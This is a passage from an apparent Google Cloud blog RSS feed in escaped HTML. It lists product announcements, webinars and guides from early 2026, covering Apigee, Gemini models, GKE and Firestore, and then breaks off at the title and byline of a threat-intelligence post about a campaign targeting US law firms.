&lt;li&gt;&lt;strong&gt;Apigee Model Context Protocol (MCP) now Generally Available&lt;br/&gt;&lt;/strong&gt;Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/3QfoEQ4" rel="noopener" target="_blank"&gt;&lt;em&gt;Explore the MCP overview&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 6 - Apr 10&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Community TechTalk: Powering Retail Agents with ADK, UCP &amp;amp; Apigee X&lt;br/&gt;&lt;/strong&gt;Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/41ocUgq" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Register for the TechTalk&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Implement multimodal capabilities in your AI agents&lt;br/&gt;&lt;/strong&gt;Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-classify-multimodal-data" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;Classify multimodal data&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To create a fluid conversational AI that processes audio and video streams in real time, see&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-bidirectional-multimodal-streaming" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable live bidirectional multimodal streaming&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To consolidate fragmented multimodal data into a searchable knowledge graph, see&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-multimodal-graph-rag-resource-orchestration" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;Multimodal GraphRAG resource orchestration&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Automate SecOps workflows with an agentic AI system&lt;br/&gt;&lt;/strong&gt;To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-orchestrate-security-ops-workflows" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;orchestrate security operations workflows&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 30 - Apr 3&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP&lt;br/&gt;&lt;/strong&gt;As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts &lt;strong&gt;Shilpi Puri &amp;amp; Wely Lau&lt;/strong&gt; for a &lt;strong&gt;webinar&lt;/strong&gt; on &lt;strong&gt;April 30th at 11:00 AM SGT&lt;/strong&gt; to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/47FX1Wn" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;strong&gt;RSVP here.&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 23 - Mar 27&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Turn your API sprawl into an agent-ready catalog&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/47dEYqc" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Read the full blog post to get started.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Webinar | April 16: AI Command &amp;amp; Control&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4t43Vg4" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RSVP here.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Modernizing and Decoupling Event Ingestion with Apigee&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.&lt;/span&gt;&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/3POgsWF" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Read the full guide.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 16 - Mar 20&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades&lt;br/&gt;&lt;/strong&gt;The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist"&gt;Explore&lt;/a&gt; the full range of what the assistant can do.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 9 - Mar 13&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;div&gt;&lt;strong&gt;Want to use Gemini to develop code and don't know where to start?&lt;/strong&gt;&lt;br/&gt;This &lt;a href="https://medium.com/google-cloud/supercharge-your-spark-development-with-gemini-1540f1cb47d4" rel="noopener" target="_blank"&gt;article&lt;/a&gt; walks through a couple of examples of developing code with Gemini prompts and identifies the changes that were needed to get the code working. The article also points to other examples available on GitHub.&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 2 - Mar 6&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model.&lt;/strong&gt; Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via &lt;/span&gt;&lt;a href="https://console.cloud.google.com/vertex-ai/studio/multimodal?mode=prompt&amp;amp;model=gemini-3.1-flash-lite-preview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;developers via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-flash-lite-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;p&gt;&lt;strong&gt;TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee&lt;/strong&gt;&lt;br/&gt;Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/4r6o6Zi" rel="noopener" target="_blank"&gt;Register for the TechTalk&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Feb 23 - Feb 27&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Pro-level image generation gets faster and more accessible with Nano Banana 2&lt;br/&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy. &lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://discuss.google.dev/t/the-intelligent-path-to-compliance-transforming-regulatory-quality-control-with-google-cloud/335276" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Stop typing, start interacting! &lt;strong&gt;The Gemini Live Agent Challenge is here&lt;/strong&gt;. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at &lt;/span&gt;&lt;a href="http://geminiliveagentchallenge.devpost.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;geminiliveagentchallenge.devpost.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Feb 9 - Feb 13&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Introducing Gemini 3.1 Pro on Google Cloud. &lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;span style="vertical-align: baseline;"&gt;3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-is-available-for-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;goal&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to help you transform your business for the agentic future. Learn more about the model’s capabilities &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Gemini 3.1 Pro is available starting today in preview in &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. 
Developers can access the model in preview via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://developer.android.com/studio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://geminicli.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automate Storage Compatibility with GKE Dynamic Default Storage Classes&lt;br/&gt;&lt;/strong&gt;Managing storage across mixed-generation VM clusters in GKE just got easier. With the new &lt;strong&gt;Dynamic Default Storage Class&lt;/strong&gt;, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/hyperdisk#automated_disk_type_selection" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;Explore automated disk type selection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Community TechTalk: AI-Powered Apigee Development with strofa.io&lt;br/&gt;&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;Join the Apigee community on February 26&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for a deep dive into&lt;/span&gt; &lt;a href="https://www.google.com/search?q=http://strofa.io" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;strofa.io&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/3Oerns3" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Register now to reserve your spot.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Jan 26 - Jan 30&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Simplify API Governance with Native OpenAPI v3 Support&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/49Wx58Z" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Accelerate API Testing with the New Open Source API Tester&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like &lt;code style="vertical-align: baseline;"&gt;proxy.basepath&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; without leaving your terminal.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4q5WDGK" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Explore the API Tester guide and start testing your proxies today.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via &lt;code style="vertical-align: baseline;"&gt;kubectl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4qEVffo" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Implement Kubernetes Secrets in your hybrid proxies.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity, especially during extended working hours and in low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings &amp;gt; Appearance menu.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://docs.cloud.google.com/docs/get-started/console-appearance" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Apigee X Networking: PSC or VPC Peering?&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4bWBGdV" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Watch the video.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Jan 19 - Jan 23&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Bridge the Gap: Excel-to-API Conversion in Apigee Portals&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/3Nq3Pjo" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn how to build it&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Elevate your applications with Firestore’s new advanced query engine&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more about Firestore pipeline operations.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Fri, 05 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/</guid><category>Google Cloud</category><category>Inside Google Cloud</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/whats_new_2026_CfhxFWX.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What’s new with Google Cloud</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/whats_new_2026_CfhxFWX.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Cloud Content &amp; Editorial </name><title></title><department></department><company></company></author></item><item><title>Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms</title><link>https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan&lt;/p&gt;
&lt;hr/&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;/h3&gt;
